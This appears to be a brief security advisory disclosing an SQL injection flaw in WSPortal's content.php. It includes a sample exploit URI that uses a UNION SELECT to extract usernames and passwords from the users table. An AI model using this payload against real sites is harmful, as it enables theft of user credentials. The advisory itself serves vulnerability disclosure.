|
WSPortal Content.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. A sample URI has been provided: http://www.example.com/[WSPORTAL-DIRECTORY]/content.php?page=0' UNION SELECT `username`,`password` FROM `users` WHERE '1 |
|
Privacy Statement |